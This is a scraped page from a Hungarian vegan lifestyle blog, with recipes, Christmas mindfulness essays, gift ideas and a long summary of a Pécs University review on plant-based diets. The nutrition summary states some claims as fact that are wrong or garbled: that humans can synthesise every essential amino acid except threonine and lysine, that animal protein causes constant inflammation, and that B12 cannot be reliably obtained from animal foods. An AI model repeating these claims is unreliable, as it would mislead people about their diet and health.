400g (azaz egy konzerv) csicseriborsó 300g (azaz majdnem egy konzerv) morzsolt kukorica fél csokor friss korianderlevél felaprítva 1 tk pirospaprika 1/2 tk őrölt kömény 1 citrom héja 4 púpozott evőkanál liszt só/bors zsemle, plusz az összes gány, ami a hamburgerbe kell.
A csicseriborsót és a kukoricát a fűszerek, a citromlé és a liszt társaságában aprítóba helyezzük, és durvára daráljuk. Ha az így kapott masszát még mindig undorítóan ragacsosnak találjuk, újabb dózis lisztet helyezünk bele. Ezután négy egyforma fasírt formázunk belőle, majd fél órára hüttőbe helyezzük. Kevés olívaolajon mindkét oldalon kisütjük, majd jajveszékelve zsemlék közé szorítjuk őket.
Tudatos felkészülés a karácsonyra - 10. rész A harmónia
2016. december 8. Élj harmóniában
Ne engedd, hogy a karácsonyi készülődés feleméssze minden energiádat és pénzedet Karácsonyi cikksorozatom utolsó része arról szól, hogy tedd félre az elvárásaidat és élvezd az Ünnepeket a legnagyobb harmóniában. A karácsonyt a szeretet ünnepének is nevezik, mert ennek az ünnepnek a lényege a szeretet. Ilyenkor mindenikek lehetősége van kicsit befelé figyelni többet foglalkozni saját belső világával és többet foglalkozni a családjával, szeretteivel. Ez az az alkalom, amikor gyakorolhatod a kedvességet, kegyességet, megbocsátást mások felé. Sajnos a jelenlegi nyugati kultúrában a karácsony egyre inkább a külsőségekről szól. Mindenhonnan lehet látni, hallani milyennek is kellene lennie a Te (Ti) karácsonyotoknak. A legtöbben próbálnak lépést tartani és megfelelni az elvárásoknak. A szeretet ünnepére való felkészülés ideje alatt sok ember több időt tölt különböző plázákban, bevásárlóközpontokban, mint a saját családjával közösen. Túl sok értékes idő megy el arra, hogy ki-ki kitalálja milyen is lenne a megfelelő díszítés, az ajándékok, a karácsonyi menü, és még sorolhatnám. Sajnos a túl sok energia megy el veszekedésre, türelmetlenkedésre, elégedetlenkedésre is. Tartsd szem előtt, hogy a karácsony lényege nem a díszítés, a vacsora vagy az ajándékok, hanem az emberi kapcsolatok, a közösen, szeretetben, harmóniában, békében töltött pillanatok. Attól senkinek nem lesz boldog a karácsonya, hogy szép a díszítés vagy ízletes a menü. Ezek csak a díszlet, a külsőségek, a közeg az emberi kapcsolatokhoz. A kapcsolat nem a külsőségeken függ, hanem az emberek között interakcióktól. Ha azért mert valami nem tökéletes és az elképzeléseid szerint alakul esetleg ingerült leszel vagy türelmetlen, esetleg vitatkozol, veszekedsz a családoddal vagy más emberekkel - akárcsak a bolti eladóval - sajnos egyre távolabb kerülsz attól, hogy akár Neked, akár a másik félnek boldog karácsonya legyen. Gondold végig mi a cél, hogy csodaszépen feldíszítsd a lakást vagy fantasztikus vacsora legyen az asztalon vagy az a célod, hogy a családoddal szeretetben, harmóniában legyetek. Tedd félre az elvárásokat. Ne aggodalmaskodj azon, hogy bárminek is meg kellene felelned. Ne légy ideges attól, ha nincs kitakarítva a lakás, nem tökéletes az ajándék, nem volt időd becsomagolni, nem készült el a díszítés, odaégett a vacsora vagy bármi olyan történik, ami az elképzelt tökéletes karácsony képébe nem illik bele. A lényeg, hogy szeretettel figyeljetek egymásra, foglalkoztatok egymással. Mindenkinek boldog, békés, szeretetteljes ünnepeket kívánok:) sok szeretettel: Kati
Datolyás karácsonyi sütemény
Advent van és ez a datolyás sütemény abszolut megállja a helyét karácsonyi készülődés alatt is egy forró tea mellé, vagy karácsonykor az ünnepi asztalon. A sütemény édes ízét a datolya és a szinte már melaszos, sötét nádcukor adja. Hozzávalók: 225 g bio margarin ( Alsan) 175 g finom őrlésű tönkölyliszt 140 g kimagozott, darabolt datolya 140 g hámozott, darabolt alma 140 g sötét, lágy barnacukor 100 g zabpehely 1 tk szódabikarbóna Sütemény teteje: Az almát négy evőkanál vízben megpároljuk és villával kissé összetörjük, hozzáadjuk a darabolt datolyát és 50 g barnacukrot, további 5 percig pároljuk. Sütemény massza: A margarint megolvasztjuk és beleszórjuk a lisztet, zabpelyhet, szódabikarbónátot és a maradék cukrot. Ezt a masszát egy sütőpapírral kibélelt 18×18-as sütőformába nyomkodjuk. Rákanalazzuk a datolyás, almás “krémet” és előmelegített sütőben 30 percig sütjük. Miután kihűlt szeletelhetjük. Több napig eláll, hűvös helyen.
Nézd a teljes képet
2016. december 4. Élj harmóniában
Az életben mindig az van, ami van. A dolgok soha nem jók vagy rosszak - minden nézőpont függvénye. Nem tudjuk előre, hogy egy dolog, ha a teljes képet nézzük, akkor végül is jó vagy rossz. Ha megérted azt, hogy a teljes kép az, hogy mindig minden érted van és a fejlődésedet szolgálja, akkor könnyedén tudod venni az életben az akadályokat és nagyfokú rugalmasságra teszel szert. Ebben a világban a rugalmasság, alkalmazkodóképesség az egyik legfontosabb dolog az életben maradáshoz. Ha megnézed a természetben a viharban a fákat, amelyik hajlong az másnap is ott áll, amelyik mereven áll, annak letörnek az ágai. Figyeld meg az állatvilágot vagy a növényeket, még a folyók is úgy alakítják útjukat, ahogy a legjobban tudnak a környezetükhöz illeszkedni. A világnak mindig csak egy pici részletét látod. Mint amikor megy egy hangya a parkettádon. Legfeljebb csak azt érzékeli, hogy sima vagy egyenetlen a talaj - ahol a mélyedés van. Fogalma sincs róla, hogy ő a szobádban van, ami a lakásodban, ami egy házban, egy adott városban, Magyarországon, Európában, a Föld nevű bolygón...
Az Édenkert Ígérete
A vörös a karácsony legfontosabb színe. Amellett, hogy melegséget áraszt, és a sötét napokon feltölt minket energiával, különleges jelentést is hordoz ezekben a hetekben.
Történeti kutatások arra jutottak, hogy a piros a tudás almájára utalt eredetileg, miután Ádám és Éva ősbűnét írta Jézus felül. A karácsonyfán lévő vörös gömbök pedig az Édenkert almáit hivatottak jelképezni, és azt üzenik, hogy az emberiség számára lehetséges még a visszatérés a Paradicsomba.
Ezek után nem is volt kétséges számomra, hogy ezt a gyönyörű, élénk színt szeretném viszontlátni a különszámba szánt receptemben is. A hogyanra válasz pedig természetesen a fantasztikus cékla, ami szükségtelenné teszi fagyasztott gyümölcsök vagy akár ételfesték használatát.
Félni nem kell tőle, dehogy lesz ebből cékla süti! A cékla színe jóval megelőzi az ízét.
A "tészta"
- 100 g aszalt szilva
- 50-50 g dió és mandula
- 40 g zabpehely
- 15 g cukor
- 60 ml tej
- 1 csipet só
A "java"
- 350 nyers sütőtök
- 75 g nyers cékla
- 80 g cukor
- 40 ml tej
- 1/2 narancs héja
- 1 púpozott mokkáskanál fahéj
- 5 csipet őrölt szegfűszeg
- 30 g étkezési keményítő
- A sütőtököt és a céklát hámozzuk meg, és vágjuk kockára. Külön-külön tegyük fel őket főni annyi vízben, ami ellepi. A sütőtök 10 perc alatt megpuhul, a céklának kellhet 20-30 perc is. Ezalatt készítsük el a tésztát.
- A tészta hozzávalóit tegyük késes aprítóba, és addig pörgessük, amíg labdává össze nem áll. Ehhez párszor le kell kapargatni a darabokat a kehely oldaláról, de ne csüggedjünk, hamarabb eljön a végeredmény, mint várnánk.
- Egy kb. 15-20 cm-es sütőformát béleljünk ki sütőpapírral, és nyomkodjuk le bele a sütemény alapját.
- A puhára főtt céklát és sütőtököt szűrjük le. A keményítőt oldjuk fel a tejben, öntsük hozzá, majd adjuk hozzá a krém többi anyagát is. Pépesítsük egy botmixer segítségével.
- A krémet tegyük vissza a tűzre, és állandó kevergetés mellett rotyogtassuk pár percet. Akkor jó, amikor hirtelen besűrűsödik. Ekkor öntsük az alapra, és simítsuk el a tetejét.
- Tegyük hideg helyre pár órára, hogy megdermedhessen. Díszítsük narancshéjjal, kókuszreszelékkel.
Jó étvágyat! Elkészítési idő: 30 perc
Tetszett ez a recept? Iratkozz fel a Hírlevélre, és mellé töltsd le az ajándékot ITT
Szupergyors Édességek és Szupergyors Vacsorák receptfüzet:
Tudományos összegzés a növényi alapú étrend kapcsán
2016. november 28. Vegán lettem
A Pécsi Tudományegyetemen készült egy tanulmány, mely 42 forrást felhasználva, tudományos alapokra helyezve méltatja a növényi alapú étrendet. 2016. augusztus 8-án készült el, és november 20-án jelent meg Magyarország első tudományos minőségű közleménye növényi alapú étrend (Plant-based diet) témában. Születtek már cikkek magyar nyelven, de hivatalosan egyik sem tekinthető tudományos minőségűnek. Ennek fokmérője (sok más szempont mellett), hogy az adott folyóirat, amiben egy közleményt közölnek rendelkezik e impact faktorral. Jelenleg ez az első magyar nyelvű tanulmány a témában, amelyről ezt elmondhatjuk, hogy a válasz: igen! A cikk az Orvosi Hetilap hasábjain jelent meg, amely azért is különösen hangsúlyos, mert a legfontosabb döntéshozók a táplálkozási ajánlások tekintetében még mindig az orvosok, így ez az írás elsősorban nekik szól. Eme cikk a Pécsi Tudományegyetem Egészségtudományi Karának Táplálkozástudományi és Dietetikai Intézetében készült. Témája a növényi alapú étrend, mint elsődleges megelőző étrend bemutatása, valamint az azzal kapcsolatos fehérje, vitamin és ásványi anyag hiányt érintő téveszmék és releváns tények bemutatása, mindezt tisztán egészségügyi és tudományos oldalról megközelítve. Szabó Zoltán, a cikk témájának ötletgazdája és első szerzője három éve vegetariánus, dietetikus, okleveles táplálkozástudományi szakember, jelenleg a Pécsi Tudományegyetem szakoktatója, valamint annak doktori képzésének résztvevője, és akit tanulmányai, kutatásai során felmerült tudományos adatok győztak meg elsődlegesen az életmód váltás fontosságáról. Növényi alapú étrend bevezetés: Első körben egy rövidebb történelmi áttekintést ad a tanulmány a növényi alapú étrend múltjáról, valamint megvilágít egy kutatási területet, mely azon a ma is szóbeszédben forgó hibás feltevésekhez vezet, ami a növényi alapú étrendet egészségtelennek aposztrofálja. A következő, szó szerinti tanulmányból vett idézet egészen precízen mutatja be, hogy milyen káros lehet hosszútávon egy tudományosnak vélt kijelentés, mely általánosítva összegez és nem vesz figyelembe egyértelműnek tűnő, a végső megállapítás témáját gyökeresen meghatározó tulajdonságokat. A szegényebb (első sorban harmadik világbeli) országokban hosszú követéses vizsgálatokat végezve azt tapasztalták, hogy ott a hús és más állati eredetű táplálékok fogyasztása nem megfelelő mennyiségű, így a kutatók azt a megállapítást szűrték le, hogy a nagyfokú alultápláltság az állati eredetű élelmiszerek korlátozott fogyasztásának a következménye. A tévesen levont következtetéseket a mai napig helytelenül magyarázzák az orvosok és a laikusok egyaránt. Ebben az esetben teljesen egyértelmű tulajdonság, hogy nem kifejezetten fehérje vagy egyéb tápanyagok hiányától szenvednek a kutatás alanyai. Nagyfokú alultpláltságuk a kiegyensúlyozott tápanyagszintekkel bíró és főleg változatos étrend hiányából fakad. Ebből adódóan kijelenthető, hogy az egyoldalú és az eredményeket befolyásoló szempontok figyelmen kívül hagyásával meghozott végkövetkeztetés képes kártékonyan befolyásolni még évekkel később is a megítélését a növényi étrendnek. A tanulmány röviden említést tesz a növényi étrend és a vegetarianizmus fajtáiról, valamint azokról a motivációs impulzusokról, amelyek eme irányba terelik a növényi étrendre voksolók többségét. Ha ez a téma érdekel, akkor a tanulmányban olvashatsz róla bővebben, jelen cikkem kapcsán azonban ez nem lényeges információ. Viszont annál fontosabb kijelentés a következő: A tudományosan megalapozott növényi alapú étrend hatásai visszakereshető eredményeken alapulnak. Ez megkülönbözteti a legtöbb divatdiétától, illetve az előbb említett vallási alapú táplálkozási gyakorlatoktól. Így a szakemberek által is széles körben elfogadható. Ennek bizonyítéka, hogy neves kutatók nyilatkoztak a növényi eredetű étrend hatékonyságáról mind primer, mind szekunder prevencióban. Ez egészen konkrétan azt jelenti, hogy bizonyos betegségek megelőzésében, a korai stádiumban diagnosztizált egyes betegségek kezelésében alkalmazzák, valamint bizonyos betegségek súlyosbodását gátolja és a szenvedő gyógyulását segíti elő a növényi alapú étrend. Növényi alapú étrend tápanyagszinten: A tanulmány megállapítja továbbá, hogy a növényi étrend alapanyagai nagy mennyiségben tartalmaznak olyan további élettanilag fontos tápanyagokat mint a fitonutriensek, amelyeket főleg nyers, hőkezeletlen vagy kevésbé hőkezelt állapotban tart meg az étel. A hagyományos tápanyagoktól - fehérje, zsír, szénhidrát, vitaminok, ásványi anyagok - eltéro?en ezek a növényi alkotóelemek nem a hagyományos értelemben véve ,,szükségszeru?ek az emberi szervezet számára. Emellett, ugyan a tanulmány nem említi, de itt kiegészíteném a növényi étrend magas rosttartalmát, amely többek kötött az emésztést és az egészséges bélmozgást segíti elő, valamint, amelytől szinte teljesen mentes minden állati eredetű táplálék. A tanulmány szerint a növényi alapú étrend egy napra vonatkozó általános ajánlása a következők szerint alakul: zöldségek tetszés szerint törekedve a változatosságra; gyümölcsök napi 1-2 bögrényi a változatosságra törekedve; teljes kiőrlésű gabonák vagy gabona alapú köretek napi 2-3 bögre vagy napi 6-11 szelet; hüvelyes növények napi 1 bögre; leveles zöldségek 2-3 bögre nyers formában, vagy 4-6 bögre főtt formában; olajos magvak (dió, mandula, pisztácia stb.) 30-55g; magvak (chia, kendermag, lenmag) 1-3 evőkanál; Növényi tejek 2-3 bögre; friss fűszernövények tetszés szerint. Fontos tudnunk, hogy ez nem minimális, hanem optimális ajánlás. (Forrás: Hever, J.: Plant-based diets: A physicians guide. Perm. J., 2016, 20(3), 93-101.) A fehérjék tekintetében: Fehérje bevitellel kapcsolatos tévhit a laikusok körében, hogy a tisztán növényi étrend elégtelen fehérjetartalma, – azaz, ha valaki mellőzi az állati fehérjék fogyasztását – kóros fehérjehiányt (ilyen a kwashior-kór és marasmus, melyek lényegében csak a harmadik világban ismert betegségek és a krónikus éhezéssel és tápanyaghiánnyal kapcsolódnak össze) és látványos izomfogyást eredményez majd. Ezt ugyan már számos külföldi tudományos kutatás is megcáfolta, de most végre magyarul is olvashatunk erről a tanulmányban. Pár érdekesség: A fehérjéket aminosavak építik fel, amelyek közül a legtöbb szakirodalom jelenleg kilencet tekint esszenciálisnak humán vonatkozásban. Valójában az emberi szervezet csupán két aminosavat nem képes önmaga szintetizálni (treonin, lizin). A treonin és lizin esszenciális aminosavakon kívül, minden más esszenciális aminosavat képes a szervezet szintetizálni bizonyos biokémiai folyamatok útján, ha a táplálkozással elegendő energiát biztosítunk számára. Tehát egyéb aminosavláncokból, esszenciális és nem esszenciálisokból egyaránt képes előállítani a számára éppen fontos fehérjeláncot. Ugyanakkor eme természetes működés egyik fontos alapja növényi alapú étrend esetén a változatos és kiegyensúlyozott táplálkozás folyamatos fenntartása. A tanulmány egy 2007-es FAO/WHO/UNU riport alapján összegzi továbbá a szervezet aminosav szükségletét, láncokra bontva. Ez a hivatalos WHO állásfoglalás tartalmazza továbbá, hogy a felnőtt ember minimális protein szükséglete 0,83 g testsúlykilogrammonként. Az alábbi adatokat egészíteném ki azzal a tanulmányban olvasható információval, miszerint a szervezet naponta átlagosan 90 g elhasznált fehérjét lök ki magából a bélrendszerbe, melynek nagy részét a szervezet újrahasznosítja. Ha emellé vesszük a változatos növényi étrenddel elfogyasztott fehérjemennyiséget, akkor kis számolással könnyen rájöhetünk, hogy a fehérjehiánnyal kapcsolatos felvetés bizony tévhit a vegán étrend kapcsán. Továbbá arról is említést tesz a cikk, hogy a növényi étrenden élőknek jóval magasabb a szérum-albumin szintje. Ez egy olyan laborparaméter, ami - egyebek mellett - arra is használható, hogy megítéljék a szervezet fehérje ellátottságát. A magas szérum-albumin szint annak köszönhető, hogy míg az állati fehérjék fogyasztása folyamatos gyulladásban (inflammáció) tartják a szervezetet, – mely egyébként katabolikus, fehérjebontó állapot is - addig a növényi étrenddel bevitt fehérje nem okoz ilyen jellegű negatív változásokat. Ennek köszönhetően indirekt módon ugyan, de jobb fehérje ellátottságot eredményez a növényi alapú táplálkozás, mint a mindenevő étrend. Pár vitamin tekintetében: A tanulmány továbbá említést tesz a B12, B6 valamint folsav vitaminok és a vas fontosságáról és kijelenti, hogy a B12 állati eredetű ételekből nem vihető be nagy biztonsággal. Ugyan említi, hogy a szárított lila alga aránylag nagy mennyiségű – 77,6 ?g/100g a napi 2,5 ?g ajánlott napi bevitel mellett – B12 vitamint tartalmaz, de arról nem tesz említést, hogy ez a B12 vitamintípusok egyik aktív formája-e, és ha igen melyik az. Ha nem aktív formája, akkor a szervezet nem képes hasznosítani. A vitaminok és ásványi anyagok növényi forrásairól, jellemzőikről bővebb információt egy régebbi cikkemben találsz, valamint az említett vas témájában érdekességeket az eredeti tanulmányban. Növényi alapú étrend és pár betegség: A továbbiakban az elhízásról, mint aggasztó problémáról írnak a cikkben. Magyarországon a lakosság 61,8%-a a BMI alapján túlsúlyosnak minősül (Európában abszolút vezetjük a mezőnyt), mely adat akkor válik igazán érdekessé, amikor hozzáolvassuk az USA átlagos 39%-os túlsúlyossági arányát, mely utóbbi arány évente 5%-kal mutat növekedő tendenciát. Ezzel szemben 2006-ban készült egy 87 tanulmányt összehasonlító metaanalízis, amely azt mutatta ki, hogy a vegetáriánus férfiak és nők jóval kisebb testtömeggel rendelkeztek, mint a vegyestáplálkozású emberek. A 87 tanulmány ténye feltételezi számomra, hogy számos jellemző mentén - demográfia, kor, életminőség, stb. - nagy merítést végezve, relevánsnak mondható ez az adat és senki nem fut bele a már említett tápanyaghiányos előítéletbe. Olyan, az elhízás talaján jelento?s rizikóval kialakuló, szív-ér rendszert érinto? betegségek, mint az angina pectoris, myocardialis ischaemia, AMI, STEMI, corona-riaatherosclerosis, mind megelo?zheto?ek lennének egy helyesen összeállított növényi alapú étrenddel. Szív- és érrendszeri megbetegedések, valamint cukorbetegség esetén is végeztek kísérleteket növényi alapú diétával. A bevitt tápanyagok százalékos aránya mindegyik esetben megközelítőleg a következőképpen alakultak: 10% zsírokból, 15% fehérjéből és 75% komplex szénhidrátokból. Egy ilyen összetételű vegán étrendet hasonlítottak össze, az Amerikai Diabetes Társaság (ADA) által javasolt vegyes étrenddel - ennek pontos jellemzőit a tanulmányban megtalálod - cukorbetegeket bevonva. A növényi étrendet tartók 43%-a csökkenthette gyógyszeradagját, míg az ADA-diétáját tartok csupán 23%-áról volt ez elmondható. 2015 októberében a WHO rákkutatással foglalkozó tudományos bizottsága, a Nemzetközi Rákkutató Ügynökség (IARC) 22 kutatója az akkor rendelkezésre álló tudományos eredmények alapján a vörös húsokat a ,,probably carcinogenic to humans - valószínu?leg rákkelto? az emberekre nézve - (2/a) kategóriába, míg a feldolgozott húskészítményeket a ,,carcinogenic to humans - emberekben rákkelto? - (1/a) kategóriába sorolta. Magyarországon és az USA-ban is a szív- és érrendszeri megbetegedések mellett a daganatos megbetegedések is élen járnak az elhalálozást okozó betegségek között. Számos populációt érintő tanulmány kiemelkedő prevenciós eszközként tekint a növényi alapú étrendre és a húsfogyasztás visszaszorítására a daganatos megbetegedések esetében. Zárás a szerzők által: A növényi alapú étrend abban tér el a divatdiétáktól, hogy tudományosan megalapozott állítások összessége alkotja azt. Ahogyan jelen összefoglalásból is kitu?nik, a növényi alapú étrend nem a ,,tudományt használja saját állításai igazolására, hanem a tudományos állítások igazolják sorra a növényi alapú étrend létjogosultságát. Tehát összefoglalva, a növényi alapú étrend nem csak a megelőzésben, hanem súlyos betegségek - szív- és érrendszeri betegségek, cukorbetegség, magas vérnyomás, csontritkulás - kezelésének kiegészítő diétájaként is ajánlott lehet, valamint, ahogy azt már megannyi tudományos tanulmányban olvastuk, úgy most ez a magyar összegzés is rámutat, hogy a megfelelően összeállított tisztán növényi alapú étrend jó hatással van szervezetünkre, és az elfogyasztott mennyiségtől függően, bőven elegendő tápanyagot szolgáltat életünk bármely stádiumában. A tanulmány szerzőjével folytatott pontosítás és beszélgetés során a következőre szeretném felhívni a figyelmet. A vegán vagy növényi alapú étrend, nem a Szent Grál. A rosszul összeállított és nem eléggé változatos növényi étrend hiánybetegségekhez vezethet ugyanúgy, ahogy a nem eléggé változatos vegyestáplálkozású étrend is. Emellett a növényi étrenden élők körében, hajlamosságtól és az élet többi területén a szervezetet ért negatív hatások fényében, ugyanúgy alakulhatnak ki komoly betegségek, ugyanakkor az 100% biztonsággal kijelenthető, hogy a kiegyensúlyozott tisztán növényi étrend betegségek kockázatát csökkenti! Mindezt úgy, hogy nem mellékesen az állatokat is békén hagyjuk. Nagy öröm számomra, hogy Magyarországon született egy ilyen tanulmány és remélem, hogy ez csak a kezdet, hogy hamarosan még több tudományosan megalapozott írással segítik elő a növényi étrend körüli téveszmék felszámolását mások is, akik ebben hivatottak. A tanulmány szerzői, az írás minden állítását a cikk alján is olvasható forrásokkal támasztják alá, számokkal és oldalszámmal is hivatkozva. Az alábbi sorra kattintva érhetitek el a teljes szöveget. (Szabó Zoltán szerző lektorálásával és engedélyével) A tanulmány további szerzői: (nagy köszönet nekik is a munkáért) Erdélyi Attila Dr. Gubicskóné Kisbenedek Andrea A. Ungár Tamás Lászlóné Dr. Polyák Éva Szekeresné Dr. Szabó Szilvia Kovács Réka Erika Raposa László Bence Dr. Figler Mária Pécsi Tudományegyetem, Egészségtudományi Kar, Táplálkozástudományi és Dietetikai Intézete A tanulmányhoz felhasznált irodalom: [1] Lim, S. S., Vos, T., Flaxman, A. D., et al.: A comparative risk as- sessment of burden of disease and injury attributable to 67 risk factors and risk factor clusters in 21 regions, 1990-2010: a sys- tematic analysis for the Global Burden of Disease Study 2010. Lancet, 2012, 380(9859), 2224-2260. [2] Mr. Mallikarjun, Mr. Vijaykumar, S. D.: Nutritional update for physicians: Plant-based diets. International Educ. Scienti c Res. J., 2016, 2(4), 82-83. [3] Palmer, S.: Nutrients of concern for individuals following a plant- based diet. 2014. Available from: http://www.todaysdietitian. com/pdf/courses/PBDNutritentsofConcernPDF.pdf [4] Leitzmann C.: Vegetarian nutrition: past, present, future. Am. J. Clin. Nutr., 2014, 100(Suppl. 1), 496S-502S. [5] Leitzmann, C., Oltersdorf, U.: Possibilities to improve the nutri- tion situation in developing countries. Cologne, Germany: Welt- forum, 1981. [German] [6] Glasauer, P., Leitzmann, C.: Food aid in disasters. 1982. Availa- ble from: http://cidbimena.desastres.hn/docum/crid/Junio 2005/ pdf/eng/doc2793/doc2793-a.pdf [7] Gashu, D., Stoecker, B. J., Adish, A., et al.: Ethiopian pre-school children consuming a predominantly unre ned plant-based diet have low prevalence of iron-de ciency anaemia. Public Health Nutr., 2016, 19(10), 1834-1841. [8] Leitzmann C.: Nutrition ecology: the contributions of vegetarian diets. Am. J. Clin. Nutr., 2003, 78(3 Suppl.), 657S-659S. [9] Steinfeld, H., Gerber, P., Wassenaar, T., et al.: The Livestock, En- vironment and Development. Livestocks longs hadow environ- mental issues and options. Food and Agriculture Organization of the United Nations, Rome, 2006. Available from: ftp://ftp.fao. org/docrep/fao/010/a0701e/a0701e.pdf [10] Marlow, H. J., Hayes, W. K., Soret, S., et al.: Diet and the environ- ment: does what you eat matter? Am. J. Clin. Nutr., 2009, 89(5), 1699S-1703S. [11] Macdiarmid, J., Kyle, J., Horgan, G. W., et al.: Sustainable diets for the future: can we contribute to reducing greenhouse gas emissions by eating a healthy diet? Am. J. Clin. Nutr., 2012, 96(3), 632-639. [12] Ornish, D., Brown, S. E., Scherwitz, L. W., et al.: Can lifestyle changes reverse coronary heart disease? The Lifestyle Heart Tri- al. Lancet, 1990, 336(8708), 129-133. [13] Hu, F. B.: Plant-based foods and prevention of cardiovascular disease: an overview. Am. J. Clin. Nutr., 2003, 78(3 Suppl.), 544S-551S. [14] Gardner, C. D., Coulston, A., Chatterjee, L., et al.: The effect of a plant-based diet on plasma lipids in hypercholesterolemic adults: a randomized trial. Ann. Intern. Med., 2005, 142(9), 725-733. [15] Barnard, N. D., Scialli, A. R., Turner-McGrievy, G., et al.: The effects of a low-fat, plant-based dietary intervention on body weight, metabolism, and insulin sensitivity. Am. J. Med., 2005, 118(9), 991-997. [16] Barnard, N. D., Cohen, J., Jenkins, D. J., et al.: A low-fat vegan diet improves glycemic control and cardiovascular risk factors in a randomized clinical trial in individuals with type 2 diabetes. Diabetes Care, 2006, 29(8), 1777-1783. [17] Lea, E. J., Crawford, D., Worsley, A.: Public views of the bene ts and barriers to the consumption of a plant-based diet. Eur. J. Clin. Nutr., 2006, 60(7), 828-837. [18] Sabaté, J.: The contribution of vegetarian diets to health and dis- ease: a paradigm shift? Am. J. Clin. Nutr., 2003, 78(3), 502S- 507S. [19] Newby, P. K.: Plant foods and plant-based diets: protective against childhood obesity? Am. J. Clin. Nutr., 2009, 89(5), 1572S -1587S. [20] Drewnowski, A., Gomez-Carneros, C.: Bitter taste, phytonutri- ents, and the consumer: a review. Am. J. Clin. Nutr., 2000, 72(6), 1424-1435. [21] Energy and protein requirements. WHO, Geneva, 1985. Available from: http://www.fao.org/docrep/003/aa040e/ AA040E00.htm [22] Rodler, I.: Food and Nutrition Health. [Energia és tápanyagfor- galom. In: Élelmezés- és táplálkozás-egészségtan. (Ed.: Rodler, I.)] Medicina Könyvkiadó, Budapest, 2008, 41-106. [Hungari- an] [23] Henkel, J.: Soy: Health claims for soy protein, questions about other components. FDA Consumer Magazine, 2000, 34(3), 13-15, 18-20. Available from: http://permanent.access.gpo. gov/lps1609/www.fda.gov/fdac/features/2000/300_soy.html [24] Moughan, P. J., Rutherfurd, S. M.: Gut luminal endogenous pro- tein: implications for the determination of ileal amino acid di- gestibility in humans. Br. J. Nutr., 2012, 108(Suppl. 2), S258- S263. [25] Vegan diets. 2015. American Heart Association. Available from: http://www.heart.org/HEARTORG/HealthyLiving/Health- yEating/Vegetarian-Diets_UCM_306032_Article.jsp#.V3ttt- biLTIW [26] Benzie, I. F., Wachtel-Galor, S.: Biomarkers in long-term vegetar- ian diets. Adv. Clin. Chem., 2009, 47, 171-222. [27] Preis, S. R., Stampfer, M. J., Spiegelman, D.: Dietary protein and risk of ischemic heart disease in middle-aged men. Am. J. Clin. Nutr., 2010, 92(5), 1265-1272. [28] Szeto, Y. T., Kwok, T. C., Benzie, I. F.: Effects of a long-term veg- etarian diet on biomarkers of antioxidant status and cardiovascu- lar disease risk. Nutrition, 2004, 20(10), 863-866. [29] Balk, E., Chung, M., Chew, P., et al.: Effects of soy on health outcomes. Evidence Report/Technology Assessment No. 126. (Prepared by Tufts-New England Medical Center Evidence- based Practice Center under Contract No. 290-02-0022.) AHRQ Publication No. 05-E024-2. Agency for Healthcare Re- search and Quality, Rockville, MD, August 2005. [30] Watanabe, F.: Vitamin B12 sources and bioavailability. Exp. Biol. Med., 2007, 232(10), 1266-1274. [31] Chambers, J. C., Ueland, P. M., Obeid, O. A., et al.: Improved vascular endothelial function after oral B vitamins. An effect me- diated through reduced concentrations of free plasma homocyst- eine. Circulation, 2000, 102(20), 2479-2483. [32] Antal, M.: Nutrient requirement. [In: Rodler, I. (ed.): New food composition table.] [Tápanyagszükséglet. In: Rodler, I. (szerk.): Új tápanyagtáblázat. (Ed.: Rodler, I.)] Medicina Könyvkiadó, Budapest, 2005, 61-70. [Hungarian] [33] Saunders, A. V., Craig, W. J., Baines, S. K., et al.: Iron and vege- tarian diets. Med. J. Aust., 2013, 199(4 Suppl.), S11-S16. Avail- able from: https://www.mja.com.au/system/ les/issues/ 196_10_040612_supplement/rei11510_fm.pdf [34] Witters, D.: More than 15% obese in nearly all U.S. metro areas. Gallup, 2012. Available from: http://www.gallup.com/poll/ 153143/Obese-Nearly-Metro-Areas.aspx [35] Berkow, S. E., Barnard, N.: Vegetarian diets and weight status. Nutr. Rev., 2006, 64(4), 175-188. [36] Friedewald, V. E., Boden, W. E., Stone, G. W., et al.: The editors roundtable: role of percutaneous coronary intervention and drug-eluting stents in patients with stable coronary heart disease. Am. J. Cardiol., 2011, 108(10), 1417-1425. [37] Ornish, D., Scherwitz, L. W., Billings, J. H., et al.: Intensive life- style changes for reversal of coronary heart disease. JAMA, 1998, 280(23), 2001-2007. [38] Xu, J., Murphy, S. L., Kochanek, K. D., et al.: Deaths: Final Data for 2013. Natl. Vital Stat. Rep., 2016, 64(2). Available from: http://www.cdc.gov/nchs/data/nvsr/nvsr64/nvsr64_02.pdf [39] IARC Monographs evaluate consumption of red meat and pro- cessed meat. Lyon, France, 26 October 2015. Available from: https://www.iarc.fr/en/media-centre/pr/2015/pdfs/ pr240_E.pdf [40] Pérez-Cueto, F. J., Verbeke, W.: Consumer implications of the WCRFs permanent update on colorectal cancer. Meat Sci., 2012, 90(4), 977-978. [41] Nechuta, S. J., Caan, B. J., Chen, W. Y., et al.: Soy food intake after diagnosis of breast cancer and survival: an in-depth analysis of combined evidence from cohort studies of US and Chinese women. Am. J. Clin. Nutr., 2012, 96(1), 123-132. [42] Richman, E. L., Stampfer, M. J., Paciorek, A., et al.: Intakes of meat, sh, poultry, and eggs and risk of prostate cancer progres- sion. Am. J. Clin. Nutr., 2010, 91(3), 712-721.
Tudatos felkészülés a karácsonyra - 4. rész
2016. november 28. Élj harmóniában
Ne engedd, hogy a karácsonyi készülődés feleméssze minden energiádat és pénzedet A cikksorozat előző részben arról írtam, hogy olyan ajándékot válassz, amire valóban szükség van. A mai bejegyzéssel csokorba gyűjtöttem néhány konkrét javaslatot. Az ajándékozásnál az egyik legjobb, ha élményt ajándékozol - utazás, színházjegy, jóga tanfolyam, masszázs, etc. . Számos kutatás alátámasztotta már, hogy az élmények sokkal több pozitív érzettel szolgálnak, mint a tárgyak. Ráadásul az élmények, olyan lenyomatokat hagynak az emberben, amelyek sok évvel később felidézve is örömet okoznak. Amennyiben az élmények helyett jobbnak tartod a tárgyak, termékek vásárlását vagy készítését próbálj olyan terméket adni, ami nem terheli nagyon a környezetet és akinek adod, annak az egészségére nem káros. Néhány egészséges ajándékötlet: - Saját készítésű finomság: mézben eltett magvak, aszalt gyümölcsök, reformkeksz, lekvár, szörp, csokoládé, bon-bon, szaloncukor - Bio élelmiszerek: tészta, teljes kiőrlésű liszt, nyers nádcukor, friss gyümölcsök, zöldségek, baszmati rizs, ghí,különleges gabonák, hüvelyesek, minőségi bio olajok Amennyiben alap élelmiszereket vásárolsz bio változatban, az nem lesz felesleges és aki elfogyasztja annak sokat teszel az egészségéért is. - Bio édességek: aszalt gyümölcsök, magvak, 